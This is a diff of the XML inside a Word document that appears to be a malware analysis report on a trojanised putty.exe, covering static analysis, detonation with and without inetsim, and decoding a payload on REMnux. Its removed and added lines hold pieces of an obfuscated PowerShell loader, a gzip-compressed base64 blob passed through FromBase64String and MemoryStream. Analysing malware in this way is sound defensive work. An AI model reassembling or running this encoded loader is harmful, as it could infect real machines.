-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">((New-Object </w:t>
+      <w:r>
+        <w:t>25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUj</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -970,15 +520,7 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>System.IO.MemoryStream</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>(,[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yU</w:t>
+        <w:t>mWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFT</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -986,7 +528,7 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>lypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7</w:t>
+        <w:t>ope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRm</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -994,39 +536,6 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUj</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>mWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFT</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>ope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRm</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>aKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+Fv</w:t>
       </w:r>
     </w:p>
@@ -1259,6 +768,69 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="PlainText"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -1281,6 +853,7 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Image snapshots</w:t>
       </w:r>
     </w:p>
@@ -1296,74 +869,12 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:noProof/>
-          <w:u w:val="single"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30E31B3B" wp14:editId="7AEA4B3C">
-            <wp:extent cx="5880735" cy="2452254"/>
-            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
-            <wp:docPr id="1867056342" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1867056342" name="Picture 1867056342"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId6">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5939861" cy="2476909"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68DF4A45" wp14:editId="75146A58">
-            <wp:extent cx="5666509" cy="5961582"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68DF4A45" wp14:editId="020D935F">
+            <wp:extent cx="4140200" cy="4355793"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
             <wp:docPr id="561817321" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1384,7 +895,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5670171" cy="5965435"/>
+                      <a:ext cx="4157359" cy="4373845"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1412,6 +923,42 @@
         <w:pStyle w:val="PlainText"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We see a lot of API calls that are frequently used by threat actors while developing malware. But on further studying I got to know that these API calls are also used by the putty software. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the IAT table did not give much info.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1589,136 +1136,97 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
+        <w:t>Basic Dynamic Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Describe initial detonation. Are there any notable occurrences at first detonation? Without internet simulation? With internet simulation?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After initial detonation. Without </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>inetsim</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> running the putty configuration dialog box appears and the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> window appears and disappears.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Basic Dynamic Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - Describe initial detonation. Are there any notable occurrences at first detonation? Without internet simulation? With internet simulation?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ans: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">After initial detonation. Without </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>inetsim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> running the putty configuration dialog box appears and the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> window appears and disappears.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD4A296" wp14:editId="7D63F949">
-            <wp:extent cx="2640787" cy="2451408"/>
-            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD4A296" wp14:editId="39DC0D37">
+            <wp:extent cx="2241550" cy="2080802"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
             <wp:docPr id="243255015" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1739,7 +1247,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2646209" cy="2456441"/>
+                      <a:ext cx="2249929" cy="2088580"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1757,22 +1265,6 @@
         <w:pStyle w:val="PlainText"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1815,7 +1307,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">The payload is executed via the </w:t>
+        <w:t>Th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1829,7 +1333,13 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve"> and the command that is executed is</w:t>
+        <w:t xml:space="preserve"> is executed </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>at detonation which we got to know from static analysis</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1925,34 +1435,227 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Procmon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> was the tool used to identify this by applying the filter on process name and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>path(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>just put path as powershell.exe)</w:t>
-      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now if we take the base64 string to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>REMnux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and decode if and store the output to a file we get a compressed file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60C34529" wp14:editId="5695B733">
+            <wp:extent cx="3841750" cy="2466339"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="770902712" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="770902712" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3868801" cy="2483705"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Extracting the file and opening it gave me the actual decompiled payload that was run during execution of the putty.exe program. We also find a lot of indicators in this file itself</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BCCBFB8" wp14:editId="06F06514">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>3223260</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>1280795</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1301750" cy="57150"/>
+                <wp:effectExtent l="0" t="0" r="12700" b="19050"/>
+                <wp:wrapNone/>
+                <wp:docPr id="1250090234" name="Rectangle 3"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1301750" cy="57150"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:solidFill>
+                            <a:srgbClr val="FF0000"/>
+                          </a:solidFill>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="2">
+                          <a:schemeClr val="accent1">
+                            <a:shade val="15000"/>
+                          </a:schemeClr>
+                        </a:lnRef>
+                        <a:fillRef idx="1">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="lt1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
